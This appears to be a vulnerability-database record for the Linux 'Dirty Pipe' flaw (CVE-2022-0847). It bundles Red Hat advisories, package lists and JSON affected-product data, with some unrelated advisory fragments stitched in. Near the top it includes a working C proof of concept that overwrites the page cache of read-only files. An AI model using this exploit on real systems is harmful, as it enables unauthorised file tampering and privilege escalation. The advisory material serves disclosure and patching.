All the vulnerabilities related to SonicWall - SMA1000
var-202203-0043
Vulnerability from VARIoT

A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in the copy_page_to_iter_pipe and push_pipe functions in the Linux kernel, and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read-only files and as such escalate their privileges on the system. The Linux kernel therefore has an initialization vulnerability: information may be obtained, information may be tampered with, and service operation may be interrupted (denial of service).
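This is the flaw publicly known as "Dirty Pipe" (CVE-2022-0847). Below is a minimal sketch of the exploitation primitive, condensed from Max Kellermann's public proof of concept; it is illustrative only and has an effect only on unpatched kernels (5.8 and later, before 5.16.11 / 5.15.25 / 5.10.102). The upstream fix simply zeroes buf->flags in copy_page_to_iter_pipe and push_pipe.

```c
/* Minimal sketch of the CVE-2022-0847 ("Dirty Pipe") primitive, condensed
 * from Max Kellermann's public proof of concept. Illustrative only: it has
 * an effect only on unpatched kernels (>= 5.8, before 5.16.11 / 5.15.25 /
 * 5.10.102), and it overwrites the page cache starting at file offset 1. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Fill the pipe completely, then drain it: every write leaves
 * PIPE_BUF_FLAG_CAN_MERGE set in the ring slot's flags, and the vulnerable
 * kernel never clears it when splice() later installs a page-cache page
 * into the same slot. */
static void prepare_pipe(int p[2])
{
    char scratch[4096];
    unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);

    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(scratch) ? sizeof(scratch) : r;
        write(p[1], scratch, n);
        r -= n;
    }
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(scratch) ? sizeof(scratch) : r;
        read(p[0], scratch, n);
        r -= n;
    }
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s TARGET_FILE DATA\n", argv[0]);
        return 1;
    }

    int fd = open(argv[1], O_RDONLY);   /* read-only is all we ever need */
    int p[2];
    pipe(p);
    prepare_pipe(p);

    /* Splice one byte so a pipe_buffer now points at the file's cached
     * page; because the stale CAN_MERGE flag survived, the following
     * write() is merged straight into that page-cache page. */
    loff_t offset = 0;
    splice(fd, &offset, p[1], NULL, 1, 0);
    write(p[1], argv[2], strlen(argv[2]));

    printf("wrote %zu bytes into the page cache of %s (if vulnerable)\n",
           strlen(argv[2]), argv[1]);
    return 0;
}
```

Because the final write goes through the pipe, the kernel never checks it against the target file's permissions; and since the page is never marked dirty, the modification normally lives only in the page cache until the page is evicted.

Summary: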

The Migration Toolkit for Containers (MTC) 1.5.4 is now available. Description:

The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):

1995656 - CVE-2021-36221 golang: net/http/httputil: panic due to racy read of persistConn after handler panic

5. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.3.8 images

Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which fix several bugs. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/

Security updates:

  • nanoid: Information disclosure via valueOf() function (CVE-2021-23566)

  • nodejs-shelljs: improper privilege management (CVE-2022-0144)

  • follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2022-0155)

  • node-fetch: exposure of sensitive information to an unauthorized actor (CVE-2022-0235)

  • follow-redirects: Exposure of Sensitive Information via Authorization Header leak (CVE-2022-0536)

Bug fix:

  • RHACM 2.3.8 images (Bugzilla #2062316)

3. Bugs fixed (https://bugzilla.redhat.com/):

2043535 - CVE-2022-0144 nodejs-shelljs: improper privilege management
2044556 - CVE-2022-0155 follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor
2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor
2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function
2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak
2062316 - RHACM 2.3.8 images

5. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update
Advisory ID:       RHSA-2022:0819-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:0819
Issue date:        2022-03-10
CVE Names:         CVE-2021-0920 CVE-2021-4154 CVE-2022-0330
                   CVE-2022-0435 CVE-2022-0492 CVE-2022-0847
                   CVE-2022-22942
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
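As a worked example of where such a base score comes from, the sketch below recomputes the CVSS 3.1 base score that NVD publishes for CVE-2022-0847 (vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). The metric weights are the standard CVSS 3.1 constants, hard-coded here for this one vector, and roundup() is a simplified rendering of the specification's Roundup function.

```c
/* Recompute the CVSS 3.1 base score of CVE-2022-0847 from its NVD vector:
 * CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
 * Compile with: cc cvss.c -lm   Expected output: 7.8 (HIGH severity). */
#include <math.h>
#include <stdio.h>

/* Simplified CVSS 3.1 Roundup: round up to one decimal place. */
static double roundup(double x) { return ceil(x * 10.0) / 10.0; }

int main(void)
{
    /* Weights from the CVSS 3.1 specification for this vector. */
    const double av = 0.55;   /* Attack Vector: Local */
    const double ac = 0.77;   /* Attack Complexity: Low */
    const double pr = 0.62;   /* Privileges Required: Low (scope unchanged) */
    const double ui = 0.85;   /* User Interaction: None */
    const double c = 0.56, i = 0.56, a = 0.56;   /* C/I/A impact: High */

    double iss = 1.0 - (1.0 - c) * (1.0 - i) * (1.0 - a);
    double impact = 6.42 * iss;                      /* Scope: Unchanged */
    double exploitability = 8.22 * av * ac * pr * ui;
    double base = impact <= 0.0 ? 0.0
                                : roundup(fmin(impact + exploitability, 10.0));

    /* %.1f rounding matches NVD's displayed sub-scores (5.9 and 1.8). */
    printf("impact=%.1f exploitability=%.1f base=%.1f\n",
           impact, exploitability, base);
    return 0;
}
```

The same CVE also carries a CVSS 2.0 score of 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C) in this record, computed under the older 2.0 formula.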

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64
Red Hat Enterprise Linux for Real Time (v. 8) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

  • kernel: improper initialization of the "flags" member of the new pipe_buffer (CVE-2022-0847)

  • kernel: Use After Free in unix_gc() which could result in a local privilege escalation (CVE-2021-0920)

  • kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout (CVE-2021-4154)

  • kernel: possible privileges escalation due to missing TLB flush (CVE-2022-0330)

  • kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS (CVE-2022-0435)

  • kernel: cgroups v1 release_agent feature may allow privilege escalation (CVE-2022-0492)

  • kernel: failing usercopy allows for use-after-free exploitation (CVE-2022-22942)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • kernel symbol '__rt_mutex_init' is exported GPL-only in kernel 4.18.0-348.2.1.rt7.132.el8_5 (BZ#2038423)

  • kernel-rt: update RT source tree to the RHEL-8.5.z3 source tree (BZ#2045589)

4. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2031930 - CVE-2021-0920 kernel: Use After Free in unix_gc() which could result in a local privilege escalation
2034514 - CVE-2021-4154 kernel: local privilege escalation by exploiting the fsconfig syscall parameter leads to container breakout
2042404 - CVE-2022-0330 kernel: possible privileges escalation due to missing TLB flush
2044809 - CVE-2022-22942 kernel: failing usercopy allows for use-after-free exploitation
2048738 - CVE-2022-0435 kernel: remote stack overflow via kernel panic on systems using TIPC may lead to DoS
2051505 - CVE-2022-0492 kernel: cgroups v1 release_agent feature may allow privilege escalation
2060795 - CVE-2022-0847 kernel: improper initialization of the "flags" member of the new pipe_buffer

6. Package List:

Red Hat Enterprise Linux Real Time for NFV (v. 8):

Source: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm

x86_64:
kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-kvm-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm

Red Hat Enterprise Linux for Real Time (v. 8):

Source: kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.src.rpm

x86_64:
kernel-rt-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-core-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debug-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debuginfo-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-debuginfo-common-x86_64-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-devel-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-modules-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm
kernel-rt-modules-extra-4.18.0-348.20.1.rt7.150.el8_5.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-0920
https://access.redhat.com/security/cve/CVE-2021-4154
https://access.redhat.com/security/cve/CVE-2022-0330
https://access.redhat.com/security/cve/CVE-2022-0435
https://access.redhat.com/security/cve/CVE-2022-0492
https://access.redhat.com/security/cve/CVE-2022-0847
https://access.redhat.com/security/cve/CVE-2022-22942
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/security/vulnerabilities/RHSB-2022-002

8. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBYippFNzjgjWX9erEAQhDwRAAjsGfW6qXFI81H8xov/wQnw/PdsUOhzDl
ISzJEeXALEQCloLH+UDcgo/wV1es00USfBo1H/SpDc5ahjBWP2pbo8QtIRKT6h/k
ord4KsAMGjqWRI+zaGbaFoL0q4okMG9H6r731TnhX06CaLXLui8iUJrQLziHo02t
/AihF9dW30/w4tXyKeMc73D1lKHImQQFfJo5xpIo8Mm7+6GFrkne8Z46SKXjjyfG
IODAcU3wA0C93bbtR4EHEbenVyVVaE5Phn40vxxF00+AQTHoc5nYpOJbDLI3bi1F
GbEKQ5pf0jkScwlfEHtHkmjPk92PA/wV41BhPoJw8oKshH4RRxml4Ps0KldI4NrQ
ypmDLZ3CfJ+saFbNLN5BARCiqJavF5A4yszHZ5QuopmC1RJx6/rAuE79KkeB0JvW
IOaXPzzc05dCqdyVBvNAu+XpVlTbe+XGBR0LalYYjYWxQSrEYAYQ005mcvEWOPRm
QfPSM7eOaAzo9RGrMirTm0Gz9BJ0TbvNGiMmMTpLdb6akx1BQcQ5bpAjUCQN0O7j
KIFri0FxflweqZswTchfdbW74VuUyTVaeFYKGhp5hFPV6lFkDUFEFC71ANvPaewE
X1Z5Ae0gFMD8w5m5eePHqYuEaL6NHtYctHlBh0ef6mrvsKq9lmxJpdXrZUO+eP4w
nEhPbkKSmMY=
=CLN6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202203-0043",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "codeready linux builder",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.8"
      },
      {
        "model": "enterprise linux server for power little endian update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.1"
      },
      {
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux for real time for nfv",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.16.11"
      },
      {
        "model": "ovirt-engine",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ovirt",
        "version": "4.4.10.2"
      },
      {
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux for ibm z systems eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.1"
      },
      {
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "sma1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "sonicwall",
        "version": "12.4.2-02044"
      },
      {
        "model": "enterprise linux for power little endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux server for power little endian update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "scalance lpe9403",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.0"
      },
      {
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "35"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux for power little endian",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "h700e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.15"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "h500e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux for ibm z systems eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "h300e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.15.25"
      },
      {
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux for power little endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux server for power little endian update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.16"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.102"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "virtualization host",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.0"
      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      },
      {
        "model": "sma1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "sonicwall",
        "version": null
      },
      {
        "model": "red hat enterprise linux eus",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      },
      {
        "model": "h300s",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "ovirt-engine",
        "scope": null,
        "trust": 0.8,
        "vendor": "ovirt",
        "version": null
      },
      {
        "model": "red hat enterprise linux for ibm z systems - extended update support",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      },
      {
        "model": "red hat enterprise linux for ibm z systems",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "red hat enterprise linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
        "version": null
      },
      {
        "model": "scalance lpe9403",
        "scope": null,
        "trust": 0.8,
        "vendor": "\u30b7\u30fc\u30e1\u30f3\u30b9",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-007117"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-0847"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.16.11",
                "versionStartIncluding": "5.16",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.15.25",
                "versionStartIncluding": "5.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.102",
                "versionStartIncluding": "5.8",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_tus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_tus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_real_time_for_nfv:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions:8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_for_power_little_endian_update_services_for_sap_solutions:8.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:redhat:codeready_linux_builder:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:8.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
